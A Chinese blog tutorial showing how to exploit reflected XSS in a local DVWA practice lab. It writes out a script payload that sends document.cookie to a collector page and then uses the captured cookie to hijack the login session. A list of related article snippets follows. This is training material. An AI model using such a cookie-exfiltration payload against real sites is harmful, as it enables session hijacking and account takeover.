dvwa下利用xss获取cookie并利用

xiaof 2019-10-28

首先呢,需要先有一个dvwa的靶场,我这里是在本地搭建了一个,先访问127.0.0.1,正常用户名密码登录

dvwa下利用xss获取cookie并利用

这里就以low级别进行操作

dvwa下利用xss获取cookie并利用

 选择反射型xss题目,先使用弹窗测试一下<script>alert(123)</script>

dvwa下利用xss获取cookie并利用

 确定可以使用代码之后,在搭建的服务器目录下创建一个cookie.php,我这里是C:\wamp\www(仅供参考)

dvwa下利用xss获取cookie并利用

 目的是为了将获取到的cookie,保存到cookie.php所在目录下自动生成一个cookie.txt

接下来需要根据题目构造js语句

<script>document.location=‘http://127.0.0.1/cookie.php?cookie=‘+document.cookie;</script>

将js语句输入,提交,成功的话会跳转到另一个界面

dvwa下利用xss获取cookie并利用

 现在我先查看一下文件目录,可以看到是已经成功创建了一个名为cookie.txt的文本

dvwa下利用xss获取cookie并利用

 另外能够看到浏览器url框内有一个cookie的值

dvwa下利用xss获取cookie并利用

 获取到cookie后打开另外一个浏览器访问dvwa(因为本地搭建原因,除非重新打开浏览器,否则cookie不能正常刷新,所以直接打开另一个浏览器方便一些),f12打开开发者工具,找到cookie值

dvwa下利用xss获取cookie并利用

将之前获取到的cookie值给替换上去,把security的impossible改为low,回到登录界面,在url后面加上获取到的cookie信息

 dvwa下利用xss获取cookie并利用

 dvwa下利用xss获取cookie并利用

 ok,已经成功利用获取到的cookie进行登录

另外划重点,这个文档仅供学习参考,任何读者用来做坏事,后果自负!!!

这个文档仅供学习参考,任何读者用来做坏事,后果自负!!!

这个文档仅供学习参考,任何读者用来做坏事,后果自负!!!

重要的事说三遍

xiaof

xiaof

相关推荐

python中requests模拟登录的三种方式(携带cookie/session进行请求网站)

session是在cookie的基础上,服务端设置session时会向浏览器发送设置一个设置cookie的请求,这个cookie包括session的id当访问服务端时带上这个session_id就可以获取到用户保存在服务端对应的session. 到此这篇关

houmenghu / 0评论 2020-11-17

ajax请求添加自定义header参数代码

我就废话不多说了,大家还是直接看代码吧~并且不会因为增加自定义请求头header,而引起预检查请求;Access-Control-Allow-Headers 表示能接受的http头部,别忘了加入你自己发明创造的头部。如果是OPTION返回空,设置返回码为2

kentrl / 0评论 2020-11-10

Python快速上手爬虫的7大技巧

Python应用最多的场景还是Web快速开发、爬虫、自动化运维。爬虫在开发过程中也有很多复用的过程,这里总结一下,以后也能省些事情。关键在于CookieJar(),它用于管理HTTP cookie值、存储HTTP请求生成的cookie、向传出的HTTP请

逍遥友 / 0评论 2020-10-26

上网如何保存记录?你要知道Session和Cookie的关系

为什么要用Session和Cookie?简单一句话,因为Session和Cookie可以记录用户状态信息。嘶..这到底啥意思呢?HTTP协议对事务处理是没有记忆能力,也就是说服务器不知道客户端是什么状态。只需要在下次请求时携带这些Cookie,服务器就能通

jincheng / 0评论 2020-09-01

python-spider 第七关

:return: a dict the contains cookies from the domain.

书虫媛 / 0评论 2020-08-18

PHP如何获取Cookie并实现模拟登录

$cookie_jar = dirname(__FILE__)."/pic.cookie";$url = "http://1.2.3.4/";$ch = curl_init();curl_setopt($ch, CU

Blueberry / 0评论 2020-08-15

Apache Shiro 反序列化(CVE-2016-4437)复现

shiro默认使用CookieRememberMeManager,对rememberMe的cookie做了加密处理,在CookieRememberMeManaer类中将cookie中rememberMe字段内容先后进行序列化、AES加密、Base64编码操

xclxcl / 0评论 2020-08-03

Apache Shiro 反序列化(CVE-2016-4437)复现

shiro默认使用CookieRememberMeManager,对rememberMe的cookie做了加密处理,在CookieRememberMeManaer类中将cookie中rememberMe字段内容先后进行序列化、AES加密、Base64编码操

zmzmmf / 0评论 2020-08-03

前端登录,这一篇就够了

登录是每个网站中都经常用到的一个功能,在页面上我们输入账号密码,敲一下回车键,就登录了,但这背后的登录原理你是否清楚呢?今天我们就来介绍几种常用的登录方式。为了解决 HTTP 无状态的问题,Lou Montulli 在 1994 年的时候,推出了 Cook

阳光之吻 / 0评论 2020-08-03

一文梳理Web存储,从cookie,WebStorage到IndexedDB

HTTP是无状态的协议,网络早期最大的问题之一是如何管理状态。cookie应运而生,开始出现在各大网站,然而随着前端应用复杂度的提高,Cookie 也渐渐演化为了一个“存储多面手”,承载了 自身仅有的4KB 内存所不能承受的压力。但web Storage也

PkJY / 0评论 2020-07-08

Flask之session

session是建立在Cookies基础上的技术,用于flask中存储不同请求间用户的信息,要使用session你必须设置一个secret_key,用于对Cookies进行密钥签名。from flask import Flask, render_templ

hzyuhz / 0评论 2020-07-04

Golang保存PostgreSQL数据至结构

db, err := sql.Open("postgres", "user=admin password=123456 dbname=test sslmode=disable"). if err != nil {.

89407707 / 0评论 2020-06-27

Session和Cookie的区别

协议,是指计算机通信网络中两台计算机之间进行通信所必须共同遵守的规定或规则,超文本传输协议是一种通信协议,它允许将超文本标记语言文档从Web服务器。HTTP协议是无状态的协议。服务器检查该Cookie,以此来辨认用户状态。若不设置过期时间,则表示这个coo

服务器端攻城师 / 0评论 2020-06-26

curl 的用法指南

curl 是常用的命令行工具,用来请求 Web 服务器。它的名字就是客户端的 URL 工具的意思。它的功能非常强大,命令行参数多达几十种。如果熟练的话,完全可以取代 Postman 这一类的图形界面工具。本文介绍它的主要命令行参数,作为日常的参考,方便查阅

阳光岛主 / 0评论 2020-06-25

Redis遇到(大数据量)百亿级Key存储需求及解决方案介绍

public static byte [] getBucketId(byte [] key, Integer bit) {

笨重的蜗牛 / 0评论 2020-06-20

golang之JWT实现的示例代码

JSON Web Token是一个开放标准,它定义了一种紧凑且自包含的方式,用于在各方之间以JSON方式安全地传输信息。由于此信息是经过数字签名的,因此可以被验证和信任。可以使用秘密或使用RSA或ECDSA的公钥/私钥对对JWT进行签名。直白的讲jwt就是

xuanwenchao / 0评论 2020-06-14

Requests 设置cookies方式

cookies_value = {‘name1‘: ‘value1‘,  path表示cookie所在的目录,asp.net默认为/,就是根目录。这是因为cookie能让其path路径下的页面访问。  浏览器会将domain和path都相同的cookie保

Lophole / 0评论 2020-06-13

django设置cookie

path=‘/‘, Cookie生效的路径,/ 表示根路径,特殊的:根路径的cookie可以被任何url的页面访问。httponly=False 只能http协议传输,无法被JavaScript获取。rep.delete_cookie # 删除用户浏览器

明瞳 / 0评论 2020-06-12

爬虫之selenium和webdriver—基础(三):操作cookie和显式等待与隐式等待

# 1、获取所有的cookie,get_cookies; 获取一个cookie,get_cookie. 为了解决这个问题,所以selenium提供了两种等待方式:显式等待和隐式等待。# 最大等待时间为10s,如果5s时id为sdfsdf被找到,就直接返回,

songerxing / 0评论 2020-06-11

Django框架11

# 校验字段和钩子函数的执行。# 报错提示 其实可以有两种方式。python源码里面使用最频繁的其实就是反射。cookie与session(非常重要!!!!!!!!# 由于http协议是无状态的。cookie虽然是服务端设置的但是浏览器可以选择不保存。存储

明瞳 / 0评论 2020-06-08

selenium自动化测试cookie操作

WebDriver操作Cookie的方法如下:。get_cookie:返回字典中key为“name”的Cookie. # 获取所有cookie信息并打印

Luu / 0评论 2020-06-08

69-django-forms组件源码刨析、cookie与session

Returns True if the form has no errors. Otherwise, False. If errors are. # 如果is_valid要返回True的话 那么self.is_bound要为True self.errors

Lucianoesu / 0评论 2020-06-05

layui框架跨域请求携带Cookie

页面中如果用ajax发起请求,默认跨域请求不携带cookie,如果需要ajax发起跨域请求并携带cookie需设置xhrFields为true。从后台和页面两处设置,即可完成跨域请求携带cookie的问题。但layui框架的表格渲染分页虽然支持跨域请求,但

李永毅 / 0评论 2020-06-04

Django Session管理

Session是存储在服务器端的用户凭证,安全性比Cookie要高,Django是将Session信息存放在Cookie里面。用户一旦禁用Cookie,就不能用了。Session不光可以存储在Cookie里面,如果前端将其存储在页面中,作为全局变量,每次发

Dreamya / 0评论 2020-06-03

RabbitMQ集群搭建

但是在客户端不可能分别连接两台内存节点,肯定是通过前端反向代理去轮询分发请求。如果担心前端反向代理服务器故障,可以通过keepalived软件做一个高可用架构。而磁盘模式的节点,由于磁盘IO相对较慢,因此仅作数据备份使用。其中15672和25672都是ra

天空windy / 0评论 2020-06-03

Shiro+JWT 实现权限管理(二)--JWT

上篇文章提及到了JWT,以及为什么使用Token,这篇文章就围绕JWT展开论述吧.服务端验证登录信息是否正确,如果正确就在服务器端为这个用户创建一个 Session,并把 Session 存入数据库。客户端接收到服务器端发来的请求之后,看见响应头中的 Se

SoarFly00 / 0评论 2020-06-03

19.负载均衡健康检查模块与源码安装Nginx

你们公司的会话保持怎么做的?# 开发没有做会话保持,我们通过运维的方式做会话保持,nginx的upstream模块中的ip_hash调度算法,保证用户的请求一直发送到同一台机器。cookie是后端服务器,传给浏览器的一段字符串,作用是用来记录用户登录的状态

咻咻ing / 0评论 2020-06-01

appscan查到的漏洞解决方案-java版

5.高速缓存的ssl页面页面添加 <meta http-equiv="Pragma" contect="no-cache">

xhpscdx / 0评论 2020-05-31

Python-使用requests库和正则表达式爬取淘宝商品信息

  1、获取taobao指定商品页面中的 价格和名称,这里以书包为例子。    在商品页右键查看源代码,然后根据商品价格和商品名搜索,会发现 商品名前有“raw_title”键,价格前有“view_price”键;    依此,获取本页面的html之后,我

StevenSun空间 / 0评论 2020-05-30

2019-2020-2 网络对抗技术 20175213吕正宏 Exp9 Web安全基础

本实践的目标理解常用网络攻击技术的基本原理,做不少于7个题目,共3.5分。Webgoat实践下相关实验。应用程序会将输入带入后台的SQL查询语句,后台数据库将其认作正常SQL指令后正常执行,可能实现对后台数据库进行各种操作,甚至造成破坏后台数据库等严重后果

三动 / 0评论 2020-05-29

django中cookie登录认证

The `urlpatterns` list routes URLs to views. For more information please see:. if request.POST.get == ‘xx‘ and request.POST.get

Jerry / 0评论 2020-05-28

5.27cookie的封装和ajax

# 一、cookie1. cookie的使用 - 增 - 默认cookie:当前路径下,会话级cookie - 指定路径 - 指定有效期 - 既指定路径,有指定有效期 ```js var d = new Date(); d.setDate; documen

春雨的雕刻时光 / 0评论 2020-05-27

Jmeter(六)- HTTP请求

  启动jmeter,默认有一个测试计划,然后,修改计划名称,尽量使其变得有意义,容易看懂,然后,新建一个线程组。  线程数设置为1,方便演示;  添加一个http信息头管理器;  Jmeter不是浏览器,因此其行为并不和浏览器完全一致。这些Jmeter提

zhaolisha / 0评论 2020-05-26

安全测试

CSRF全称为跨站请求伪造,是一种网络攻击方式,也被称为 one-click attack 或者 session riding。CSRF攻击利用网站对于用户网页浏览器的信任,挟持用户当前已登陆的Web应用程序,去执行并非用户本意的操作。用户登录、浏览并信任

老道长的测试生活 / 0评论 2020-05-25

【刷题】面筋-页面很卡的原因分析

打开开发者工具看network里的瀑布图。② CSS Sprites合并图片,通过指定CSS的backgroud-image和backgroud-position来显示元素。script没有async和defer时,JS文件将在下载后立即执行。② 将coo

kenson / 0评论 2020-05-19

Jmeter http接口添加header和cookie

HTTP信息头管理器在Jmeter的使用过程中起着很重要的作用,通常我们在通过Jmeter向服务器发送http请求的时候,往往后端需要一些验证信息,比如说web服务器需要带过去cookie给服务器进行验证,一般就是放在请求头中,因为对于此类请求,在Jmet

xiechao000 / 0评论 2020-05-18

Django: 项目实战从0开始---实现登录注册系统。(7)

  因为因特王国HTTP协议的特效,每一次来自用户的浏览器请求都是无状态的,独立的,通俗的说,就是无法保存用户的状态,后台服务器根本不知道当前请求和以前及以后的请求是否来自同一用户,对于静态网站,这可能不是个问题,而对动态网站,尤其是京东,天猫等购物网站,

时光如瑾雨微凉 / 0评论 2020-05-18

session和cookie

Cookie通过在客户端记录信息确定用户身份,Session通过在服务器端记录信息确定用户身份。服务器检查该Cookie,以此来辨认用户状态。如果不设置过期时间,则表示这个cookie的生命期为浏览器会话期间,关闭浏览器窗口,cookie就消失。这种生命期

bruce / 0评论 2020-05-17

Go语言中如何确保Cookie数据的安全传输

Cookie是服务器发送到用户浏览器并保存在本地的一小块数据,它会在浏览器下次向同一服务器再发起请求时被携带并发送到服务器上。通常,它用于告知服务端两个请求是否来自同一浏览器,如保持用户的登录状态。Cookie使基于无状态的HTTP协议记录稳定的状态信息成

free0day / 0评论 2020-03-08

PHP中的各种区别

POST传送的数据量较大,一般被默认为不受限制。考虑到减轻服务器性能方面,应当使用COOKIE。

JF0 / 0评论 2020-05-11

session和cookie的深入理解

我们在浏览网站的过程中,经常会遇到需要登录的情况,而有些网页只有登录之后才可以访问,而且登录之后可以连续访问很多次网站,但是有时候过一段时间就需要重新登录。还有一些网站,在打开浏览器时就自动登录了,而且很长时间都不会失效,这种情况又是为什么?其实这里面涉及

OwenJi / 0评论 2020-05-10

cookie,localStorage,sessionStorage的区别

Cookie会发送到服务器端,存储在内存中,localStorage只存储在浏览器端,sessionStorage存储在内存中。为什么要封装Storage?

coolhty / 0评论 2020-05-09

JavaScript相关, Cookie

Cookie 用于存储 web 页面的用户信息。Cookie 是一些数据, 存储于你电脑上的文本文件中。当 web 服务器向浏览器发送 web 页面时,在连接关闭后,服务端不会记录用户的信息。在用户下一次访问该页面时,可以在 cookie 中读取用户访问记

xiaoge00 / 0评论 2020-05-09

针对负载均衡集群中的session解决方案的总结

在日常运维工作中,当给Web站点使用负载均衡之后,必须面临的一个重要问题就是Session的处理办法,无论是PHP、Python、Ruby还是Java语言环境,只要使用服务器保存Session,在做负载均衡时都需要考虑Session的问题。根据负载均衡策略

后厂村老司机 / 0评论 2020-05-08

安全测试

例如在知道一个页面的绝对url地址后,该页面有个session变量叫login-in,如果login-in为False时访问该页面跳转到登录页面,为True可正常访问。由于请求都是真实的,但是请求量过大导致服务器崩溃。连接数量过大时会导致服务器资源崩溃。c

today0 / 0评论 2020-05-04

Shiro RememberMe 1.2.4 反序列化命令执行漏洞复现

然而AES的密钥是硬编码的,就导致了攻击者可以构造恶意数据造成反序列化的RCE漏洞。前16字节的密钥-->后面加入序列化参数-->AES加密-->base64编码-->发送cookie. python shiro_shell.py

visionzheng / 0评论 2020-05-04

flask-session组件:将cookie中的session值存放至redis

  问题2:cookie默认超时时间是多久?

八角塘塘主 / 0评论 2020-04-25

干货I Python 爬虫:8 个常用的爬虫技巧总结!

用python也差不多一年多了,python应用最多的场景还是web快速开发、爬虫、自动化运维:写过简单网站、写过自动发帖脚本、写过收发邮件脚本、写过简单验证码识别脚本。爬虫在开发过程中也有很多复用的过程,这里总结一下,以后也能省些事情。某些网站反感爬虫的

LowisLucifer / 0评论 2020-04-23

python爬取豆瓣影评,根据关键词生成词云图

爬取豆瓣评论是需要用户登录的,所以需要先拿到登陆相关 cookie。进入浏览器登陆豆瓣之后,按下 F12 ,拿到请求头里的 cookie 与 user-agent 的数据,保持登陆状态不要退出。简单获取《豪斯医生》的某一页影评,经过分析影评的 html 数

sunnyhappy0 / 0评论 2020-04-20

Session与Cookie的区别与使用

HTTP是一种无状态的协议,为了分辨链接是谁发起的,需自己去解决这个问题。不然有些情况下即使是同一个网站每打开一个页面也都要登录一下。而Session和Cookie就是为解决这个问题而提出来的两个机制。Session存储在服务器端,保存用户名、登陆状态等信

SoarFly00 / 0评论 2020-04-19